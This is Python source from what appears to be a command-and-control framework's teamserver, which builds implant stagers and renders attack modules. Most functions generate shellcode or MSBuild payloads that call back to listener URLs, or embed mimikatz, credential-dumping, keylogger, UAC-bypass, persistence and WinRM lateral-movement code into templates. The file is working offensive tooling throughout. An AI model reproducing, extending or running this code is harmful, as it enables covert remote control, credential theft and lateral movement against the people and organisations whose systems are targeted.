def payload(self):
    """Render the ``excel4dcom.boo`` module source for the selected listener.

    Resolves the listener named by the ``Listener`` option over IPC, registers
    a fresh session (GUID + pre-shared key), packs ``naga.exe`` with donut and
    substitutes the hex byte array, target and architecture into the template.

    Returns:
        The filled-in module source, or ``None`` (after ``print_bad``) when no
        listener of that name exists.
    """
    listener_name = self.options['Listener']['Value']
    listener = ipc_server.publish_event(Events.GET_LISTENERS, (listener_name, ))
    if not listener:
        print_bad(f"Listener '{listener_name}' not found!")
        return None

    # Bind address first, then any extra callback URLs; ``filter(None, ...)``
    # drops an empty CallBackURls entry so there is no trailing comma.
    c2_urls = ','.join(filter(None, [
        f"{listener.name}://{listener['BindIP']}:{listener['Port']}",
        listener['CallBackURls'],
    ]))
    guid = uuid.uuid4()
    psk = gen_stager_psk()
    ipc_server.publish_event(Events.SESSION_REGISTER, (guid, psk))

    # Architecture code as this module maps it: 2 for x64, 1 for anything else.
    arch_code = 2 if self.options['Architecture']['Value'] == 'x64' else 1
    donut_shellcode = donut.create(
        file=get_path_in_package('core/teamserver/data/naga.exe'),
        params=f"{guid};{psk};{c2_urls}",
        arch=arch_code,
    )
    shellcode = shellcode_to_hex_byte_array(donut_shellcode)

    template_path = get_path_in_package('core/teamserver/modules/boo/src/excel4dcom.boo')
    with open(template_path) as module_src:
        src = module_src.read()

    # Same substitution order as before: the large shellcode blob goes first.
    substitutions = (
        ('SHELLCODE', shellcode),
        ('TARGET', self.options['Target']['Value']),
        ('ARCH', self.options['Architecture']['Value']),
    )
    for placeholder, value in substitutions:
        src = src.replace(placeholder, value)
    return src
def generate(self, listener):
    """Render the MSBuild stager template for *listener*.

    Returns:
        ``(guid, psk, template)``: the new session id, its pre-shared key and
        the ``msbuild.xml`` text with every placeholder substituted.
    """
    exe_path = get_path_in_package('core/teamserver/data/naga.exe')
    template_path = get_path_in_package('core/teamserver/stagers/templates/msbuild.xml')
    with open(exe_path, 'rb') as assembly, open(template_path) as template_file:
        guid = uuid.uuid4()
        psk = gen_stager_psk()
        # Bind address first, then extra callback URLs; empty entries dropped.
        c2_urls = ','.join(filter(None, [
            f"{listener.name}://{listener['BindIP']}:{listener['Port']}",
            listener['CallBackURls'],
        ]))
        template = template_file.read()
        # Placeholders are replaced in the original order; the encoded
        # assembly is by far the largest value and goes in last.
        substitutions = (
            ('GUID', str(guid)),
            ('PSK', psk),
            ('URLS', c2_urls),
            ("NAME_GOES_HERE", gen_random_string_no_digits(5)),
            ("BASE64_ENCODED_ASSEMBLY", dotnet_deflate_and_encode(assembly.read())),
        )
        for placeholder, value in substitutions:
            template = template.replace(placeholder, value)
    return guid, psk, template
def gen_encrypted_stage(self, comms):
    """Build the stage archive for *comms* and return it encrypted.

    The archive is an in-memory zip (deflate, level 9) containing the four
    Boo.Lang runtime DLLs and ``Main.boo`` (the stager code generated for
    *comms*). The zip bytes are passed through ``self.crypto.encrypt``.
    """
    stage = gen_stager_code(comms)

    # Read every DLL before assembling the archive; a missing file therefore
    # fails before any zip entry is written.
    dll_names = (
        "Boo.Lang.dll",
        "Boo.Lang.Compiler.dll",
        "Boo.Lang.Parser.dll",
        "Boo.Lang.Extensions.dll",
    )
    dll_blobs = []
    for dll_name in dll_names:
        with open(get_path_in_package(f'core/teamserver/data/{dll_name}'), 'rb') as dll:
            dll_blobs.append((dll_name, dll.read()))

    stage_file = BytesIO()
    with ZipFile(stage_file, 'a', compression=ZIP_DEFLATED, compresslevel=9) as zip_file:
        for dll_name, blob in dll_blobs:
            zip_file.writestr(dll_name, blob)
        zip_file.writestr("Main.boo", stage)
    return self.crypto.encrypt(stage_file.getvalue())
def payload(self):
    """Render the ``mimikatz.boo`` module source.

    Embeds the x86 and x64 powerkatz DLLs and the PE loader (each
    deflate+base64 encoded via ``dotnet_deflate_and_encode``) and the
    ``Command`` option into the template.
    """
    embedded_binaries = (
        ("COMPRESSED_PE_x86", 'core/teamserver/data/powerkatz_x86.dll'),
        ("COMPRESSED_PE_x64", 'core/teamserver/data/powerkatz_x64.dll'),
        ("MIMI_PE_LOADER", 'core/teamserver/data/mimikatz_peloader.dll'),
    )
    substitutions = []
    for placeholder, rel_path in embedded_binaries:
        with open(get_path_in_package(rel_path), 'rb') as binary:
            substitutions.append((placeholder, dotnet_deflate_and_encode(binary.read())))
    substitutions.append(("MIMIKATZ_COMMAND", self.options['Command']['Value']))

    template_path = get_path_in_package('core/teamserver/modules/boo/src/mimikatz.boo')
    with open(template_path) as module_src:
        src = module_src.read()
    for placeholder, value in substitutions:
        src = src.replace(placeholder, value)
    return src
def generate(self, listener):
    """Produce donut shellcode for ``naga.exe`` pointed at *listener*.

    Returns:
        ``(guid, psk, shellcode)`` where *shellcode* is the hex-string form
        of the donut output.
    """
    exe_path = get_path_in_package('core/teamserver/data/naga.exe')
    # NOTE(review): ``assembly`` is never read -- donut receives the path.
    # The open() still surfaces a missing file before donut runs.
    with open(exe_path, 'rb') as assembly:
        guid = uuid.uuid4()
        psk = gen_stager_psk()
        # Bind address first, then extra callback URLs; empty entries dropped.
        c2_urls = ','.join(filter(None, [
            f"{listener.name}://{listener['BindIP']}:{listener['Port']}",
            listener['CallBackURls'],
        ]))
        # Architecture codes as used by this stager: 2 for x64, 1 for x86,
        # 3 when the option is neither.
        arch_by_name = {'x64': 2, 'x86': 1}
        arch = arch_by_name.get(self.options['Architecture']['Value'], 3)
        donut_shellcode = donut.create(
            file=exe_path,
            params=f"{guid};{psk};{c2_urls}",
            arch=arch,
        )
    shellcode = shellcode_to_hex_string(donut_shellcode)
    return guid, psk, shellcode
def payload(self):
    """Render the ``internalmonologue.boo`` module source.

    Embeds the encoded DLL and rewrites each ``name=`` assignment in the
    template with the corresponding option value. Every assignment is
    lower-cased, which also lower-cases the quoted ``Challenge`` value.
    """
    opts = self.options
    with open(get_path_in_package('core/teamserver/data/internalmonologue.dll'), 'rb') as dll:
        encoded_dll = dotnet_deflate_and_encode(dll.read())

    template_path = get_path_in_package('core/teamserver/modules/boo/src/internalmonologue.boo')
    with open(template_path) as module_src:
        src = module_src.read()

    substitutions = (
        ("INTERNAL_MONOLOGUE_DLL", encoded_dll),
        ("impersonate=", f"impersonate={opts['Impersonate']['Value']}".lower()),
        ("threads=", f"threads={opts['Threads']['Value']}".lower()),
        ("downgrade=", f"downgrade={opts['Downgrade']['Value']}".lower()),
        ("restore=", f"restore={opts['Restore']['Value']}".lower()),
        ("challenge=", f"challenge=\"{opts['Challenge']['Value']}\"".lower()),
        ("verbose=", f"verbose={opts['Verbose']['Value']}".lower()),
    )
    for placeholder, value in substitutions:
        src = src.replace(placeholder, value)
    return src
def payload(self):
    """Return the ``unattendedinstallfiles.boo`` source unchanged (no options)."""
    template_path = get_path_in_package('core/teamserver/modules/boo/src/unattendedinstallfiles.boo')
    with open(template_path, 'r') as module_src:
        return module_src.read()
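def payload(self):
    """Render the ``execute-assembly.boo`` module source.

    Reads the .NET assembly named by the ``Assembly`` option (``~`` is
    expanded), embeds it deflate+base64 encoded together with its
    on-disk size, and renders the ``Arguments`` option (split shell-style
    by ``split``) as a Boo ``array(string, (...))`` initializer.

    Raises:
        FileNotFoundError: if the assembly path does not exist. This is a
            subclass of ``Exception``, so callers that caught the previous
            generic ``Exception`` still work.
    """
    template_path = get_path_in_package('core/teamserver/modules/boo/src/execute-assembly.boo')
    with open(template_path) as module_file:
        module = module_file.read()

    assembly_path = os.path.expanduser(self.options['Assembly']['Value'])
    if not os.path.exists(assembly_path):
        raise FileNotFoundError("Assembly not found in specified path")
    assembly_size = os.path.getsize(assembly_path)
    with open(assembly_path, 'rb') as assembly:
        encoded_assembly = dotnet_deflate_and_encode(assembly.read())

    # An empty Arguments option leaves the placeholder blank, so the template
    # declares the array without an initializer.
    boolang_string_array = ''
    arguments = self.options['Arguments']['Value']
    if arguments:
        # Each argument becomes a backtick-quoted Boo string literal; an
        # argument containing a backtick is not escaped and will not render
        # as a valid literal.
        formatted_arguments = ', '.join(f"`{arg}`" for arg in split(arguments))
        boolang_string_array = f"= array(string, ({formatted_arguments}))"

    module = module.replace("B64_ENCODED_COMPRESSED_ASSEMBLY", encoded_assembly)
    module = module.replace("DECOMPRESSED_ASSEMBLY_LENGTH", str(assembly_size))
    module = module.replace("ASSEMBLY_ARGS", boolang_string_array)
    # The leftover ``print(module)`` that dumped the whole rendered source
    # (including the encoded assembly) to stdout has been removed.
    return module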
def payload(self):
    """Render the ``domainusers.boo`` module source from the module options.

    Free-text options are substituted as given; flag-style options are
    rendered through ``str(...).lower()`` so they read as Boo literals.
    """
    template_path = get_path_in_package('core/teamserver/modules/boo/src/domainusers.boo')
    with open(template_path, 'r') as module_src:
        src = module_src.read()

    opts = self.options
    substitutions = (
        ("IDENTITY", opts['Identity']['Value']),
        ("LDAP_FILTER", opts['LDAPFilter']['Value']),
        ("PROPERTIES", opts['Properties']['Value'].lower()),
        ("UAC_FILTER", opts['UACFilter']['Value']),
        ('SPN', str(opts['SPN']['Value']).lower()),
        ('DO_ALLOW_DELEGATION', str(opts['DoAllowDelegation']['Value']).lower()),
        ('DISALLOW_DELEGATION', str(opts['DisallowDelegation']['Value']).lower()),
        ('ADMINCOUNT', str(opts['AdminCount']['Value']).lower()),
        ('TRUSTED_TO_AUTH', str(opts['TrustedToAuth']['Value']).lower()),
        ('PREAUTH_NOT_REQUIRED', str(opts['PreauthNotRequired']['Value']).lower()),
        ('FIND_ONE', str(opts['FindOne']['Value']).lower()),
    )
    # Order is preserved from the original so substituted values that happen
    # to contain a later placeholder behave exactly as before.
    for placeholder, value in substitutions:
        src = src.replace(placeholder, value)
    return src
def payload(self):
    """Render the ``domaincomputers.boo`` module source from the module options.

    Free-text options are substituted as given; flag-style options are
    rendered through ``str(...).lower()`` so they read as Boo literals.
    """
    template_path = get_path_in_package('core/teamserver/modules/boo/src/domaincomputers.boo')
    with open(template_path, 'r') as module_src:
        src = module_src.read()

    opts = self.options
    substitutions = (
        ("IDENTITY", opts['Identity']['Value']),
        ("LDAP_FILTER", opts['LDAPFilter']['Value']),
        ("PROPERTIES", opts['Properties']['Value'].lower()),
        ("UAC_FILTER", opts['UACFilter']['Value']),
        ('UNCONSTRAINED', str(opts['Unconstrained']['Value']).lower()),
        ('TRUSTED_TO_AUTH', str(opts['TrustedToAuth']['Value']).lower()),
        ('PRINTERS', str(opts['Printers']['Value']).lower()),
        ('SPN', str(opts['SPN']['Value']).lower()),
        ('OPERATING_SYSTEM', opts['OperatingSystem']['Value']),
        ('SERVICE_PACK', opts['ServicePack']['Value']),
        ('SITE_NAME', opts['SiteName']['Value']),
        ('FIND_ONE', str(opts['FindOne']['Value']).lower()),
    )
    # Order is preserved from the original so substituted values that happen
    # to contain a later placeholder behave exactly as before.
    for placeholder, value in substitutions:
        src = src.replace(placeholder, value)
    return src
def payload(self):
    """Return the ``rick-astley.boo`` source unchanged (no options)."""
    template_path = get_path_in_package('core/teamserver/modules/boo/src/rick-astley.boo')
    with open(template_path, 'r') as module_src:
        return module_src.read()
def payload(self):
    """Return the ``alwaysinstallelevated.boo`` source unchanged (no options)."""
    template_path = get_path_in_package('core/teamserver/modules/boo/src/alwaysinstallelevated.boo')
    with open(template_path, 'r') as module_src:
        return module_src.read()
def payload(self):
    """Return the ``mcafeesitelistfiles.boo`` source unchanged (no options)."""
    template_path = get_path_in_package('core/teamserver/modules/boo/src/mcafeesitelistfiles.boo')
    with open(template_path, 'r') as module_src:
        return module_src.read()
def payload(self):
    """Render the ``getregistrykey.boo`` module source.

    The hive name is upper-cased; key and value names are substituted as given.
    """
    template_path = get_path_in_package('core/teamserver/modules/boo/src/getregistrykey.boo')
    with open(template_path, 'r') as module_src:
        src = module_src.read()

    opts = self.options
    substitutions = (
        ('REGISTRY_HIVE', str(opts['RegistryHive']['Value']).upper()),
        ('REGISTRY_KEY', opts['RegistryKey']['Value']),
        ('REGISTRY_VALUE', opts['RegistryValue']['Value']),
    )
    for placeholder, value in substitutions:
        src = src.replace(placeholder, value)
    return src
def __init__(self, teamserver):
    """Set up the module loader for *teamserver*.

    ``modules`` starts empty and ``selected`` as ``None``; the base class is
    initialised with the Boo module directory as its only search path.
    """
    self.teamserver = teamserver
    self.modules: list = []
    self.selected = None
    module_search_paths = [get_path_in_package("core/teamserver/modules/boo/")]
    super().__init__(type="module", paths=module_search_paths)
def payload(self):
    """Return the ``dumpVaultCredentials.boo`` source unchanged (no options)."""
    template_path = get_path_in_package('core/teamserver/modules/boo/src/dumpVaultCredentials.boo')
    with open(template_path) as module_src:
        return module_src.read()
def __init__(self, teamserver):
    """Set up the listener loader for *teamserver*.

    ``listeners`` starts empty and ``selected`` as ``None``. The loader
    subscribes ``_get_listeners`` to ``Events.GET_LISTENERS`` on the IPC
    server before the base class is initialised with the listeners directory.
    """
    self.teamserver = teamserver
    self.listeners: list = []
    self.selected = None
    ipc_server.attach(Events.GET_LISTENERS, self._get_listeners)
    listener_search_paths = [get_path_in_package("core/teamserver/listeners/")]
    super().__init__(type="listener", paths=listener_search_paths)
def payload(self):
    """Return the ``modifiableservices.boo`` source unchanged (no options)."""
    template_path = get_path_in_package('core/teamserver/modules/boo/src/modifiableservices.boo')
    with open(template_path, 'r') as module_src:
        return module_src.read()
def get_comms(comms):
    """Collect the Boo source for each requested comms channel.

    For every name in *comms*, the ``<name>.boo`` file in
    ``core/teamserver/comms/`` whose stem matches case-insensitively
    (after stripping whitespace) is appended to the output.

    Returns:
        ``(constructors, source)``: a ``", "``-joined list of ``NAME()``
        constructor calls (upper-cased) and the concatenated file contents.
    """
    comms_dir = get_path_in_package("core/teamserver/comms/")
    source = StringIO()
    constructors = []
    for channel in comms:
        wanted_stem = channel.strip().lower()
        for comm_file in os.listdir(comms_dir):
            if not comm_file.endswith('.boo'):
                continue
            if comm_file[:-4].lower() != wanted_stem:
                continue
            constructors.append(f"{channel.strip().upper()}()")
            with open(os.path.join(comms_dir, comm_file)) as channel_code:
                source.write(channel_code.read())
    return ", ".join(constructors), source.getvalue()
def payload(self):
    """Render the ``bypassUACfodhelper.boo`` module source.

    Every option value is passed through ``str()`` before substitution.
    """
    template_path = get_path_in_package('core/teamserver/modules/boo/src/bypassUACfodhelper.boo')
    with open(template_path, 'r') as module_src:
        src = module_src.read()

    opts = self.options
    substitutions = (
        ('BINARY', str(opts['Binary']['Value'])),
        ('ARGUMENTS', str(opts['Arguments']['Value'])),
        ('PATH', str(opts['Path']['Value'])),
    )
    for placeholder, value in substitutions:
        src = src.replace(placeholder, value)
    return src
def generate(self, listener):
    """Return ``(guid, psk, exe_text)`` for the raw ``naga.exe`` stager.

    The binary is decoded as latin-1 so every byte maps to exactly one code
    point. *listener* is accepted for interface parity but not used here.
    """
    with open(get_path_in_package('core/teamserver/data/naga.exe'), 'rb') as exe:
        guid = uuid.uuid4()
        psk = gen_stager_psk()
        exe_text = exe.read().decode('latin-1')
    return guid, psk, exe_text
def payload(self):
    """Render the ``winrm.boo`` module source with a freshly generated stage.

    Resolves the selected stager and listener over IPC, generates the stage
    for that listener, registers the new session, and substitutes the
    connection options plus the stage text into the template.

    Returns:
        The filled-in module source, or ``None`` (after ``print_bad``) when
        either the stager or the listener lookup fails.
    """
    opts = self.options
    stager_name = opts['Stager']['Value']
    stager = ipc_server.publish_event(Events.GET_STAGERS, (stager_name, ))
    listener = ipc_server.publish_event(Events.GET_LISTENERS, (opts['Listener']['Value'], ))
    if not (stager and listener):
        print_bad('Invalid stager/listener selected')
        return None

    if stager_name == 'powershell':
        # This writes into the stager object returned over IPC, not a copy.
        stager.options['AsFunction']['Value'] = False

    template_path = get_path_in_package('core/teamserver/modules/boo/src/winrm.boo')
    with open(template_path, 'r') as module_src:
        guid, psk, stage = stager.generate(listener)
        ipc_server.publish_event(Events.SESSION_REGISTER, (guid, psk))
        src = module_src.read()

    # Same order as before; the stage is substituted last.
    substitutions = (
        ('TARGET', opts['Host']['Value']),
        ('USERNAME', opts['Username']['Value']),
        ('DOMAIN', opts['Domain']['Value']),
        ('PASSWORD', opts['Password']['Value']),
        ('TRUSTED_HOSTS', str(opts['AddToTrustedHosts']['Value']).lower()),
        ('PAYLOAD', stage),
    )
    for placeholder, value in substitutions:
        src = src.replace(placeholder, value)
    return src
def payload(self):
    """Render the ``ls.boo`` module source with the ``Path`` option substituted."""
    template_path = get_path_in_package('core/teamserver/modules/boo/src/ls.boo')
    with open(template_path, 'r') as module_src:
        src = module_src.read()
    return src.replace('PATH', self.options['Path']['Value'])
def payload(self):
    """Render the ``rdp.boo`` module source with the ``RDP_Status`` option.

    Note the placeholder is the lower-case word ``status``: every occurrence
    of that word in the template is replaced, not just a dedicated token.
    """
    template_path = get_path_in_package('core/teamserver/modules/boo/src/rdp.boo')
    with open(template_path) as module_src:
        src = module_src.read()
    return src.replace('status', self.options['RDP_Status']['Value'])
def payload(self):
    """Render the ``mouseshaker.boo`` module source with the ``Offset`` option.

    The offset is stringified so a numeric option value is accepted.
    """
    template_path = get_path_in_package('core/teamserver/modules/boo/src/mouseshaker.boo')
    with open(template_path, 'r') as module_src:
        src = module_src.read()
    return src.replace('OFFSET', str(self.options['Offset']['Value']))
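def payload(self):
    """Render the ``keylogger.boo`` module source with the ``Duration`` option.

    The value is passed through ``str()`` so a numeric option does not raise
    ``TypeError`` from ``str.replace`` -- the same convention the sibling
    modules use for their numeric options (e.g. ``Offset``). A string value
    is unaffected.
    """
    template_path = get_path_in_package('core/teamserver/modules/boo/src/keylogger.boo')
    with open(template_path, 'r') as module_src:
        src = module_src.read()
    return src.replace('MINUTES', str(self.options['Duration']['Value']))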
def payload(self):
    """Render the ``startupfolderpersistence.boo`` module source.

    ``Command``, ``Arguments`` and ``FileName`` are substituted as given;
    ``Status`` is rendered through ``str(...).lower()``.
    """
    template_path = get_path_in_package('core/teamserver/modules/boo/src/startupfolderpersistence.boo')
    with open(template_path, 'r') as module_src:
        src = module_src.read()

    opts = self.options
    substitutions = (
        ('COMMAND', opts['Command']['Value']),
        ('ARGUMENTS', opts['Arguments']['Value']),
        ('FILENAME', opts['FileName']['Value']),
        ('STATUS', str(opts['Status']['Value']).lower()),
    )
    for placeholder, value in substitutions:
        src = src.replace(placeholder, value)
    return src
def payload(self):
    """Render the ``bypassUACEventVwr.boo`` module source.

    The ``PAYLOAD`` placeholder receives the stringified ``Command`` option.
    """
    template_path = get_path_in_package('core/teamserver/modules/boo/src/bypassUACEventVwr.boo')
    with open(template_path, 'r') as module_src:
        src = module_src.read()
    return src.replace('PAYLOAD', str(self.options['Command']['Value']))
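def payload(self):
    """Render the ``impersonateprocess.boo`` module source with ``ProcessID``.

    The value is passed through ``str()`` so a numeric process id does not
    raise ``TypeError`` from ``str.replace``, matching how the sibling
    modules handle numeric options. A string value is unaffected.
    """
    template_path = get_path_in_package('core/teamserver/modules/boo/src/impersonateprocess.boo')
    with open(template_path, 'r') as module_src:
        src = module_src.read()
    return src.replace('PROCESS_ID', str(self.options['ProcessID']['Value']))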
def __init__(self, teamserver):
    """Set up the stager loader for *teamserver*.

    ``selected`` starts as ``None``. The loader subscribes ``_get_stagers``
    to ``Events.GET_STAGERS`` on the IPC server before the base class is
    initialised with the stagers directory as its only search path.
    """
    self.teamserver = teamserver
    self.selected = None
    ipc_server.attach(Events.GET_STAGERS, self._get_stagers)
    stager_search_paths = [get_path_in_package("core/teamserver/stagers/")]
    super().__init__(type="stager", paths=stager_search_paths)